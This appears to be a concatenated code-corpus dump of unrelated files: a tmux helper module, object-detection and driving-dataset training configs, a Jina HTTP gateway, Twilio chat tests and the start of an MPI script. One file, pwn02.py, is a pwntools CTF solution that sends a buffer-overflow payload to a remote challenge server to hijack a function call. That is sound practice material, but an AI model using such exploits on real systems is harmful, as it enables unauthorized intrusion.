out = output.get(self.ctx.pattern, self.get_option('max_lines'))
save_path = environment.temp_file('output.txt')
with open(save_path, 'w') as f:
f.write(out)
pane_id = tmux.get_variable('pane_id')
helper = os.path.join(environment.get_var('main_dir'), 'scripts', 'fpp_helper.sh')
res = utils.run_in_split_window('cat {} | /home/sergei/opt/fpp/fpp -nfc -ai -ni -c {}'.format(
save_path, helper))
if res == 0:
tmux.run(['paste-buffer', '-p', '-b', 'clost_fpp'])
class insert_snippet(Command):
def run(self):
snippets_dir = env.vars['snippets_dir']
ctx_snippets_dir = os.path.join(snippets_dir, self.ctx.name)
if not os.path.isdir(ctx_snippets_dir):
return
snippet_names = os.listdir(ctx_snippets_dir)
snippet_name = split.select_split(snippet_names,
self.get_option('selector'))
if not snippet_name:
return
snippet.insert_snippet(snippets_dir, self.ctx.name, snippet_name,
self.get_option('bracketed_paste'))
# with open(os.path.join(ctx_snippets_dir, snippet_name), 'rb+') as f:
# tmux.insert_text(
# f.read()[:-1], bracketed=self.get_option('bracketed_paste'))
class edit_cmd(Command):
def preprocess(self, text):
return text
def postprocess(self, text):
return text
def run(self):
cmd_file = env.temp_file_path('cmd.txt')
with open(cmd_file, 'w') as f:
f.write(self.preprocess(self.ctx.cmd_line))
# editor = common.get_config()['editor']
# editor = environment.expand_path(config.get_option('editor'))
editor = self.get_option('editor')
res = split.run_in_split_window(
'{} {}'.format(editor, cmd_file), capture_output=False)
if res != 0:
log.info(
'Editing command line was cancelled (editor exited with status {})',
res)
return
with open(cmd_file) as f:
new_cmd = self.postprocess(f.read().strip())
if new_cmd == self.ctx.cmd_line:
log.info('Command line not changed during editing')
else:
tmux.replace_cmd_line(
new_cmd, bracketed=self.get_option('bracketed_paste'))
class splitlines_edit_cmd(edit_cmd):
def preprocess(self, text):
return '\n'.join(shlex.split(text))
def postprocess(self, text):
return ' '.join([pipes.quote(s) for s in text.splitlines()])
class show_context(Command):
def run(self):
sys.stdout.write('''tmux-clost current context:
CONTEXT: {self.ctx.name}
PATTERN: {self.ctx.pattern}
CMD: {self.ctx.cmd_line}
'''.format(**locals()))
class prev_prompt(Command):
def run(self):
tmux.run(['copy-mode'])
hist_size = int(tmux.get_variable('history_size'))
pos = int(tmux.get_variable('scroll_position')) + 1
while pos < hist_size:
new_pos = min(pos + 1000, hist_size)
lines = tmux.capture_pane(start=-new_pos, end=-pos, dump=True)
try:
offset = list(context.finditer_prompts(
lines, self.ctx.pattern))[-1].start
except IndexError:
pos = new_pos + 1
continue
lineno = lines.count('\n', 0, offset)
tmux.run(['send-keys', '-X', 'goto-line', new_pos - lineno])
return
raise common.ClostError('No previous prompt')
class next_prompt(Command):
def run(self):
tmux.run(['copy-mode'])
scroll_pos = int(tmux.get_variable('scroll_position'))
if scroll_pos == 0:
raise common.ClostError('Already at bottom of history')
pos = scroll_pos - 1
lines = tmux.capture_pane(start=-pos, dump=True)
try:
offset = next(context.finditer_prompts(lines,
self.ctx.pattern)).start
except StopIteration:
raise common.ClostError('No next prompt')
lineno = lines.count('\n', 0, offset)
new_pos = max(pos - lineno, 0)
tmux.run(['send-keys', '-X', 'goto-line', new_pos])
class cmd_line(Command):
def run(self):
if not tmux.pane_in_mode():
res = self.ctx.cmd_line
else:
scroll_pos = int(tmux.get_variable('scroll_position'))
lines = tmux.capture_lines(start=-scroll_pos)
iter_ = context.finditer_prompts(lines, self.ctx.pattern)
try:
prompt = next(iter_)
cl_end = lines.find('\n', prompt.end)
res = lines[prompt.end:cl_end].lstrip()
except StopIteration:
raise common.ClostError('No command line found below')
log.debug('Captured command line: {}', res)
sys.stdout.write(res)
class sleep(Command):
def run(self):
import time
time.sleep(10)
class wait_for_prompt(Command):
requires_context = False
opt_arg_defs = [('window_id', str,
'ID of window on which silence occured')]
def run(self):
if self.args['window_id']:
return self._check_prompt()
if tmux.get_option(
'wait_for_prompt_pane', clost=True, window=True):
log.info('Already waiting for prompt, disabling...')
return self._disable_waiting()
tmux.set_option(
'wait_for_prompt_pane',
tmux.get_variable('pane_id'),
clost=True,
window=True)
tmux.set_option(
'monitor-silence',
self.get_option('monitor_interval'),
window=True)
tmux.set_option('visual-silence', 'off', window=True)
tmux.set_option('silence-action', 'any', window=True)
tmux.set_hook('alert-silence',
'run-shell -b "#{@clost} wait-for-prompt --window-id #{hook_window}"')
def _disable_waiting(self, target=None):
tmux.set_option('monitor-silence', 0, window=True, target=target)
tmux.set_option('wait_for_prompt_pane', None,
clost=True, window=True, target=target)
def _check_prompt(self):
win_id = self.args['window_id']
pane_id = tmux.get_option(
'wait_for_prompt_pane', clost=True, window=True, target=win_id)
if not pane_id:
log.warning('Not waiting for prompt in this window')
return
win_panes = tmux.list_panes(target=win_id)
if pane_id not in win_panes:
log.warning(
'The pane waiting for prompt no longer belongs to this window (waiting pane {}, window panes {})',
pane_id, win_panes)
elif context.get_current(target=pane_id):
log.info('Pane reached prompt')
cmd = self.get_option('command')
env = dict(
TMUX_WINDOW=tmux.get_variable('window_name', pane=pane_id))
utils.run_command(cmd, shell=True, env=env, pipe=True)
else:
log.info('Prompt not detected, continuing waiting...')
return
self._disable_waiting(target=win_id)
class configure(Command):
requires_context = False
def run(self):
if config.options['intercept_enter']:
tmux.bind_key('Enter', ['send-keys', 'Enter'])
split.bind_enter()
class list_options(Command):
requires_context = False
opt_arg_defs = [('command', str, 'TODO'), ('context', str, 'TODO')]
def run(self):
ctx_name = self.args['context']
cmd_name = self.args['command']
ctx = None
if ctx_name is not None:
try:
ctx = context.Context(cfg=config.contexts_by_name[ctx_name])
except KeyError:
raise Exception('Invalid context {}'.format(ctx_name))
cmd = None
if cmd_name is not None:
try:
cmd_class = _list_commands()[cmd_name]
except KeyError:
raise common.ClostError('Invalid command {}'.format(cmd_name))
cmd = cmd_class()
cmd.init(ctx, {})
if ctx is not None and cmd is not None:
options = cmd.options
print "Context '{}' options for command '{}':".format(
ctx_name, cmd_name)
elif ctx is not None:
options = ctx.options
print "Context '{}' options:".format(ctx_name)
elif cmd is not None:
options = cmd.options
print "Command '{}' options:".format(cmd_name)
else:
options = config.options
print "Global options:"
json.dump(options, sys.stdout, indent=4)
print
def _list_commands():
return {x.name(): x for x in globals().itervalues()
if inspect.isclass(x) and issubclass(x, Command) and x != Command}
def populate_subparsers(subparsers):
for cmd_class in _list_commands().values():
cmd_class.add_subparser(subparsers)
def parse_command(args=None, modify=None, server_side=False):
parser = argparse.ArgumentParser(add_help=(modify is not None))
if modify:
modify(parser)
subparsers = parser.add_subparsers()
populate_subparsers(subparsers)
return parser.parse_args(args=args)
#TODO: not used
def handle_command(cmd_args):
ctx = None
if cmd_args.cmd_class.requires_context:
ctx = context.get_current()
if ctx is None:
if not cmd_args.cmd_class.silent_no_context:
raise common.ClostError('Could not detect context')
cmd = cmd_args.cmd_class()
cmd.init(ctx, vars(cmd_args))
if ctx:
cmd.strip_suggestion()
cmd.run()
| 34.415948
| 118
| 0.580124
|
acff8b8911d548c627355d2c60ecc17fb876f35c
| 1,949
|
py
|
Python
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 850
|
2020-10-27T08:51:54.000Z
|
2022-03-30T15:12:06.000Z
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 94
|
2020-12-01T02:18:47.000Z
|
2022-03-30T08:14:27.000Z
|
libs/configs/DOTA2.0/r2cnn/cfgs_res50_dota2.0_r2cnn_v1.py
|
Artcs1/RotationDetection
|
095be17345ee9984d8de8f24eb6b5a0b2d764a06
|
[
"Apache-2.0"
] | 149
|
2020-10-29T03:30:32.000Z
|
2022-03-29T09:53:23.000Z
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from libs.configs._base_.models.faster_rcnn_r50_fpn import *
from libs.configs._base_.datasets.dota_detection import *
from libs.configs._base_.schedules.schedule_1x import *
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
# schedule
BATCH_SIZE = 1
GPU_GROUP = "0,1,2,3"
NUM_GPU = len(GPU_GROUP.strip().split(','))
LR = 0.001 * BATCH_SIZE * NUM_GPU
SAVE_WEIGHTS_INTE = 40000
DECAY_STEP = np.array(DECAY_EPOCH, np.int32) * SAVE_WEIGHTS_INTE
MAX_ITERATION = SAVE_WEIGHTS_INTE * MAX_EPOCH
WARM_SETP = int(WARM_EPOCH * SAVE_WEIGHTS_INTE)
# dataset
DATASET_NAME = 'DOTA2.0'
CLASS_NUM = 18
# model
# backbone
pretrain_zoo = PretrainModelZoo()
PRETRAINED_CKPT = pretrain_zoo.pretrain_weight_path(NET_NAME, ROOT_PATH)
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
VERSION = 'FPN_Res50D_DOTA2.0_1x_20210419'
"""
R2CNN
FLOPs: 1238358557; Trainable params: 41791132
This is your evaluation result for task 1:
mAP: 0.5234759167701059
ap of each class:
plane:0.7980263807994686,
baseball-diamond:0.5040420743072365,
bridge:0.4054416907024359,
ground-track-field:0.6211356797664414,
small-vehicle:0.585125118187571,
large-vehicle:0.5215541280742031,
ship:0.666279086558348,
tennis-court:0.7773580788348857,
basketball-court:0.5859180577370384,
storage-tank:0.7340726762524007,
soccer-ball-field:0.42389526398486815,
roundabout:0.5512795363468848,
harbor:0.44366789061959877,
swimming-pool:0.5732843312238601,
helicopter:0.5230771307504916,
container-crane:0.16472019343420496,
airport:0.39625862292530317,
helipad:0.14743056135666283
The submitted information is :
Description: FPN_Res50D_DOTA2.0_1x_20210419_68w
Username: sjtu-deter
Institute: SJTU
Emailadress: yangxue-2019-sjtu@sjtu.edu.cn
TeamMembers: yangxue
"""
| 28.661765
| 72
| 0.779887
|
acff8bf0444949898df7046de7e8b5c72f7b3230
| 1,169
|
py
|
Python
|
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
bdd_mtl/configs/mtl/bdd_dla34up_d_non-city30k.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | null | null | null |
from bdd_mtl_factory import get_configs
import sys
################################################################################
#
# Format of the command to get configs:
#
# $MODEL_NAME-$TASKS
#
# task correspondence:
# l - Lane marking
# r - Drivable area
# s - Semantic segmentation
# d - Detection
# i - Instance Segmentation
# t - Multiple object Tracking
# x - Multiple object Tracking with Segmentation
#
################################################################################
cfg = get_configs('dla34up-d')
# Override default configs. Feel free to override more fields
cfg.optimizer['lr'] = 0.02
cfg.lr_config['step'] = [16, 22]
cfg.total_epochs = 24
cfg.data['imgs_per_gpu'] = 4
cfg.data['workers_per_gpu'] = 4
cfg.work_dir = './work_dirs/debug/BDD-d_non-city-30k/dla34up'
cfg.load_from = None
cfg.resume_from = None
cfg.data['train'][0]['ann_file'] = cfg.data['train'][0]['ann_file'][:-5] + '_non-city_30k.json'
cfg.data['test'][0]['ann_file'] = cfg.data['val'][0]['ann_file'][:-5] + '_non-city.json'
for k, v in cfg.__dict__.items():
if not k.startswith('__'):
setattr(sys.modules[__name__], k, v)
| 30.763158
| 95
| 0.578272
|
acff8d94c64eea3ed7f2f8e2a83808db761638c1
| 298
|
py
|
Python
|
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
] | 2
|
2022-03-20T02:27:59.000Z
|
2022-03-20T02:28:02.000Z
|
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
] | null | null | null |
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
] | null | null | null |
from pwn import *
io = remote('pwn.challenge.ctf.show', 28185)
e = ELF('stack')
address = e.symbols['stack']
log.success('stack_func_address => %s' % hex(address).upper())
payload = b'a'*(0x9 + 0x4) + p32(address)
# payload = b'a'*(0x9 + 0x4) + p32(0x804850F)
io.sendline(payload)
io.interactive()
| 29.8
| 62
| 0.671141
|
acff8e4b8d9f35cefd647587de00025ef953861b
| 2,461
|
py
|
Python
|
jina/peapods/runtimes/gateway/http/__init__.py
|
vishalbelsare/jina
|
ae72cc5ce1f7e7f4c662e72e96ea21dddc28bf43
|
[
"Apache-2.0"
] | 15,179
|
2020-04-28T10:23:56.000Z
|
2022-03-31T14:35:25.000Z
|
jina/peapods/runtimes/gateway/http/__init__.py
|
manavshah123/jina
|
f18b04eb82d18a3c554e2892bbae4b95fc0cb13e
|
[
"Apache-2.0"
] | 3,912
|
2020-04-28T13:01:29.000Z
|
2022-03-31T14:36:46.000Z
|
jina/peapods/runtimes/gateway/http/__init__.py
|
manavshah123/jina
|
f18b04eb82d18a3c554e2892bbae4b95fc0cb13e
|
[
"Apache-2.0"
] | 1,955
|
2020-04-28T10:50:49.000Z
|
2022-03-31T12:28:34.000Z
|
import os
import asyncio
from jina import __default_host__
from .....importer import ImportExtensions
from ...zmq.asyncio import AsyncNewLoopRuntime
from .app import get_fastapi_app
__all__ = ['HTTPRuntime']
class HTTPRuntime(AsyncNewLoopRuntime):
"""Runtime for HTTP interface."""
async def async_setup(self):
"""
The async method setup the runtime.
Setup the uvicorn server.
"""
with ImportExtensions(required=True):
from uvicorn import Config, Server
class UviServer(Server):
"""The uvicorn server."""
async def setup(self, sockets=None):
"""
Setup uvicorn server.
:param sockets: sockets of server.
"""
config = self.config
if not config.loaded:
config.load()
self.lifespan = config.lifespan_class(config)
self.install_signal_handlers()
await self.startup(sockets=sockets)
if self.should_exit:
return
async def serve(self, **kwargs):
"""
Start the server.
:param kwargs: keyword arguments
"""
await self.main_loop()
from .....helper import extend_rest_interface
uvicorn_kwargs = self.args.uvicorn_kwargs or {}
self._server = UviServer(
config=Config(
app=extend_rest_interface(get_fastapi_app(self.args, self.logger)),
host=__default_host__,
port=self.args.port_expose,
log_level=os.getenv('JINA_LOG_LEVEL', 'error').lower(),
**uvicorn_kwargs
)
)
await self._server.setup()
async def async_run_forever(self):
"""Running method of ther server."""
await self._server.serve()
async def _wait_for_cancel(self):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
# handle terminate signals
while not self.is_cancel.is_set() and not self._server.should_exit:
await asyncio.sleep(0.1)
await self.async_cancel()
async def async_teardown(self):
"""Shutdown the server."""
await self._server.shutdown()
async def async_cancel(self):
"""Stop the server."""
self._server.should_exit = True
| 29.297619
| 83
| 0.570093
|
acff8e824f8507d338bc4bf18d7a453261e9c447
| 953
|
py
|
Python
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 5
|
2019-07-20T19:39:33.000Z
|
2020-10-08T14:16:53.000Z
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 6
|
2019-07-20T18:03:38.000Z
|
2021-02-02T22:05:41.000Z
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 1
|
2019-07-20T17:57:55.000Z
|
2019-07-20T17:57:55.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `phishing_detection` package."""
import unittest
from click.testing import CliRunner
from phishing_detection import phishing_detection
from phishing_detection import cli
class TestPhishing_detection(unittest.TestCase):
"""Tests for `phishing_detection` package."""
def setUp(self):
"""Set up test fixtures, if any."""
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_000_something(self):
"""Test something."""
def test_command_line_interface(self):
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'phishing_detection.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
| 27.228571
| 74
| 0.66212
|
acff8ee104dc46d6a70421edd0fbe56f39d3540b
| 12,408
|
py
|
Python
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ChannelTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:37Z",
"created_by": "system",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'delete',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
headers=headers,
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.create(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels',
headers=headers,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:38Z",
"created_by": "username",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.create()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"channels": [
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:37Z",
"created_by": "system",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
],
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"next_page_url": null,
"key": "channels"
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"channels": [],
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"next_page_url": null,
"key": "channels"
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
headers=headers,
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:38Z",
"created_by": "username",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
| 46.646617
| 166
| 0.580674
|
acff8f7067cb8b1a9e22205ca617e1d08c5c1c85
| 4,706
|
py
|
Python
|
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | 17
|
2022-03-01T13:12:11.000Z
|
2022-03-31T09:55:45.000Z
|
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | 2
|
2022-03-01T16:33:10.000Z
|
2022-03-07T07:48:03.000Z
|
import sys
import numpy as np
from wordcount import load_word_counts, load_text, DELIMITERS
import time
from mpi4py import MPI
def preprocess_text(text):
"""
